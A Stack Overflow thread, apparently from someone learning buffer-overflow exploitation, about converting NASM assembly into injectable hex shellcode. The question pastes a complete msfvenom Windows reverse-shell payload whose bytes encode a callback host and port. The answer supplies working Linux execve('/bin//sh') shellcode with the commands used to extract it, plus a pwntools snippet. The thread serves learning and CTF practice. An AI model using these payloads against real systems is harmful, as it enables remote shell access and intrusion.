3

the thing is I'm training on the buffer overflow bug, and I got to the point where I just inject something into the memory, but the problem is that I have a very small space in the ESP to work with so I've made a simple "hello world" in assembly:

The Assembly code (simple hello world)

global _start
;;;;;64bit only
_start:
    jmp short string

code:
    pop rsi
    xor rax, rax
    mov al, 1
    mov rdi, rax
    mov rdx, rdi
    add rdx, 14
    syscall

    xor rax, rax
    add rax, 60
    xor rdi, rdi
    syscall

string:
    call code
    db  'Hello, world!',0x0A

this was written in Nasm

I first found this when generating a msfvenom payload, there is an option to specify the language of the shellcode(i specified C) then it generates the hex executable code which you can just inject into memory and simply run it.

The Hex Code (executable hex code for a reverse shell)

unsigned char buf[] = \xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x89\xe5\x31\xff\x0f\xb7\x4a\x26\x8b\x72\x28\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49\x75\xef\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3\x85\xc9\x74\x3c\x49\x8b\x34\x8b\x31\xff\x01\xd6\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x01\x66\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5;

but when I tried to do that myself I found that I have to write the program in assembly then convert it to the hex executable code, which I was looking for a way to do it for a week but nothing.

What I've tried

I tried to convert the assembly instructions one by one then add the arguments (also converted to hex) which didn't work obviously.

-----

that assembly code seems to work with : ./nasm.exe -fwin64 shellcode.asm but not with : ./nasm.exe -fwin32 shellcode.asm

I think it's not compatible with 32bit.

and also when i execute: ./nasm.exe -felf64 shellcode.asm -o shellcode.o then : ld -s -o shellcode shellcode.o it sais unrecognized format of the file shellcode.o

segfaulty
  • 39
  • 1
  • 7
  • You will need to fill in the addresses for `helloMsg`, `printf` and `exit` yourself. – Jester Dec 17 '21 at 13:16
  • but I can't get the definitions of the variables to be converted to hex, and also does the address of the variables in the assembly stay the same when you inject the hex code into the memory stack of another process? I discovered something just now in "NASM" which gives the hex for the assembly, but it says "Intel Hex encoded flat binary" I don't know if that's the right hex code though. the way i geberate it is using the command: "nasm.exe -f ith main.asm". – segfaulty Dec 17 '21 at 13:28
  • I've added it to the answer with the output. – segfaulty Dec 17 '21 at 13:33
  • 2
    No, ihex is a special format. You just want a flat binary `-f bin` and use a hexdump tool. In any case, as I said, you will need to fill in the addresses which do depend on the target process (and of course the target needs to have the C library mapped to start with). – Jester Dec 17 '21 at 13:42
  • Yes, the code and data all need to be together in one section (not `.data`), but using libc functions is not a good starting point for making shellcode, if that's what you're trying to do. You also would of course need to use PC-relative addressing for the data, not 32-bit absolute. (Or as Jester says, to fix up the address.) – Peter Cordes Dec 17 '21 at 13:50
  • oh, ok so I have to debug first to have the addresses then hardcode them in the Assembly code using the right format (little Indian, etc), then compile and copy the hex using the "HxD" tool? – segfaulty Dec 17 '21 at 13:52
  • @PeterCordes I've changed the syntax since I switched to using nasm.exe, (post edited). – segfaulty Dec 17 '21 at 13:56
  • Now you've put your strings in `section .data` which definitely won't work for shellcode. But you're targeting Linux `int 0x80` system calls, now, apparently, so you don't need to know addresses of library functions or anything, and can just make a self-contained thing that uses position-independent addressing to reach its own data. So that makes it easy, just look for any hello world x86 32-bit shellcode example or tutorial. – Peter Cordes Dec 17 '21 at 13:57
  • oh, I thought I'm making a shellcode for a windows x86!! I'm so lost right now, all I understand is to hardcode the addresses with PC-relative addressing and to add the variables to the .text section so that they'd be in the stack Instead of the data iguess. – segfaulty Dec 17 '21 at 14:02
  • I guess I'll have to get back the syntax i was using in VS2019 and remove the libc functions. is that right? – segfaulty Dec 17 '21 at 14:03
  • 1
    If you know what Windows version you're targeting and can look up reverse-engineered system-call numbers, you could maybe use `int 0x2e` directly, if that still works under 64-bit kernels. (The WinAPI DLLs far-jump to 64-bit mode for `syscall`). It doesn't really matter whether you use MASM or NASM; any MASM features that help linking to DLLs are irrelevant, so you probably just want NASM to make flat binaries. It's not NASM that means you're targeting Linux, it's the use of `int 0x80`, which only Linux kernels use. It will just fault on Windows; try it in non-shellcode. – Peter Cordes Dec 17 '21 at 14:10
  • [Linux 64-bit shellcode](https://stackoverflow.com/q/26823678) shows how to convert `objdump -d` disassembly to a C-string with a hacktastic inefficient shell one-liner. (It doesn't matter what the target OS actually is; that happens to be Linux x86-64 shellcode but it would work the same for `nasm -fwin32` or `nasm -felf32`.) Not a duplicate because that's not what the question's about. And it's probably not the best hex-dump method. – Peter Cordes Dec 17 '21 at 14:13
  • someone just told me to use "int 21h", I think it's x86. so now I need to read a little bit about pc-relative addressing. and removing bad chars which is only "0x00" as I found when debugging the vulnerable app. is this it or i need something else for this to work? – segfaulty Dec 17 '21 at 14:18
  • @PeterCordes thanks for the reference, I think this would help a lot. – segfaulty Dec 17 '21 at 14:23
  • @lovethisstuff: Interrupt 21h services only work for 86-DOS processes, **not** for MS Windows. – ecm Dec 17 '21 at 14:28
  • @ecm ok thanks, so syscall is the way to go here. – segfaulty Dec 17 '21 at 14:31
  • this is so frustrating I think I'll need another week to get to where I need to. by injecting this simple shellcode I think I'll learn the basics to help me learn how to do a complicated. – segfaulty Dec 17 '21 at 14:33
  • 1
    No, you should only use `syscall` in 64-bit code, not 32-bit. (It was introduced by AMD, so modern AMD CPUs support it even in 32-bit mode, but Intel only adopted `syscall` for 64-bit mode.) It's easier to learn asm if you start by writing normal programs and see how they assemble to machine code. (And on Windows I guess start playing around with how to avoid libraries? Or just target Linux shellcode since it has a stable system-call ABI). Only once you understand that should you start thinking about how to inject snippets of machine code + data into other processes! – Peter Cordes Dec 17 '21 at 14:51
  • @PeterCordes oh that explains why I wouldn't compile using `nasm fwin32` – segfaulty Dec 17 '21 at 14:53
  • @PeterCordes `ld -s -o shellcode shellcode.o` **says unrecognized format**, – segfaulty Dec 17 '21 at 14:54
  • I found an example call to windows function without using interrputs: ```global _main extern _printf section .text _main: push message call _printf add esp, 4 ret message: db 'Hello, World', 10, 0``` – segfaulty Dec 17 '21 at 14:57
  • You're using 64-bit registers (i.e. `rax`), not 32-bit (i.e. `eax`) ones- why would it compile as 32-bit? – user1280483 Dec 19 '21 at 01:50

1 Answers1

4

I have learned this in the software security course. Since that was over a year ago, it is a little bit hard for me to remember all the details. I will focus on the main points.

Let's write simple assembly code first.

GLOBAL _start
_start:
    xor rdx, rdx                ;use xor edx,edx to save 1 byte
    push rdx
    mov rax, 0x68732f2f6e69622f ;The result of '/bin//sh' in reverse byte order
    push rax                    ;push '/bin//sh' into stack
    mov rdi, rsp                ;Get the address of '/bin//sh' from rsp and put it into rdi
    push rdx 
    push rdi
    mov rsi, rsp
    xor rax, rax
    mov al, 0x3b
    syscall

Use nasm to compile and Run the shellcode.

nasm -f elf64 shellcode.asm -o shellcode.o
ld shellcode.o -o shellcode               
./shellcode

Use objdump to get the hex output. You can use compiler explorer as well.

objdump -d shellcode

You can get shellcode directly by filtering irrelevant output by using instructions below.

objdump -d ./shellcode|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

This is the output.

"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"

According to comments, Linux commands listed below also works after adding bits 64 to the assembly code.

xxd -ps shellcode |  sed 's/../\\x\0/g'

Besides, if you are a CTF tyro, you can use pwntools. It is much more convenient.

from pwn import *
context(arch = 'amd64', os = 'linux',log_level = 'debug')
shellcode=asm(shellcraft.amd64.linux.sh())
print(shellcode)

You can also use cobaltstrike and msfvenom.

ecm
  • 2,583
  • 4
  • 21
  • 29
moep0
  • 358
  • 1
  • 8
  • 2
    Don't post pictures of text unless there's more than actually just text. Here, you could have copy/pasted from your terminal into a code block. You did extract that actual `objdump` command into a code block, but the nasm/ld build commands are obscured inside an image. – Peter Cordes Dec 18 '21 at 12:52
  • 2
    Also, what ancient NASM version are you using that doesn't default to optimizing your inefficient code, e.g. your `xor rdx, rdx` is still coming out with a useless REX.W prefix. NASM for years has defaulted to `-O2` so you get the [optimal](https://stackoverflow.com/q/33666617/224132) and architecturally equivalent `31 d2 xor %edx, %edx`, as in [Why NASM on Linux changes registers in x86\_64 assembly](https://stackoverflow.com/q/48596247). Or maybe you actually used YASM to make that machine code? It won't optimize the operand-size for you by default. – Peter Cordes Dec 18 '21 at 12:55
  • 3
    Or you could just use `nasm shellcode.asm ; xxd -ps shellcode`... – Arget Dec 18 '21 at 16:25
  • @PeterCordes Fixed the problem that using pictures of text. Besides, I am using NASM 2.14.02, which seems the latest version. Compiler explorer gives the same result. – moep0 Dec 20 '21 at 02:53
  • @ Arget I tried this method. It gives too much irrelevant hex output. – moep0 Dec 20 '21 at 02:55
  • 1
    Oh hmm, apparently I'm mistaken. I knew NASM optimized `mov rax, 1` into `mov eax, 1` for you, but it seems it doesn't optimize xor-zeroing with 2.11.05 or 2.15.05 when I actually tried it just now. So you should always do that manually, unless you want an ASCII `'H'` there in your shellcode for some reason. – Peter Cordes Dec 20 '21 at 03:11
  • 1
    xxd doesn't give any irrelevant hex output. You're probably running it on `nasm -felf64` output and dumping the ELF metadata. That's not what @Arget wrote; for `nasm shellcode.asm` to work, you need to use `bits 64` so you can assemble 64-bit machine code into a flat binary, but then you're golden and can just hexdump that. (And add `\x` between pairs of hex digits by piping through `sed 's/../\\x\0/g' ` or awk or something.) – Peter Cordes Dec 20 '21 at 03:13
  • @PeterCordes That's right. Since the space for shellcode is very tight sometimes, it is helpful to use some code-golf tricks. Besides, `bits 64` does work. Thanks for pointing it out. – moep0 Dec 20 '21 at 08:24